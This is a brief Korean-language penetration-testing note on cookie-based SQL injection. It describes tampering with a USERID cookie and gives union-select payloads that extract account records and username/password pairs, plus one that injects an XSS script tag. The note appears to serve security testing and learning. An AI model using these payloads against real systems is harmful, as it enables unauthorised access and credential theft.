1. 개요
- Cookie를 사용하는 경우에 시도해볼 만한 취약점.2. 점검 방법
- 브라우저에서 서버로 전달되는 request 값의 header 값을 확인한다.- Cookie 값중에서 USERID 값을 변조하고 서버에 전달한다.
- 만약 sql 관련 에러가 발생하면 SQL 취약점이 있다는 것이다.
- 방금 수정한 USERID 의 값을 다음과 같이 union sql 취약점을 시도한다.
USERID=1 union select accountid, acct_type from accounts;--
USERID=1 union select username, password from users;--
- 다음과 같이 sql 구문 안에 XSS 구문을 삽입 할 수도 있다.
USERID=1 union select "<script>alert(1234)</script>","injection FOUND!" from accounts;--
참고
- http://blog.naver.com/jaewook376/220563891080
- http://limjunyoung.tistory.com/111 (cookie-Based SQL Injection 관련)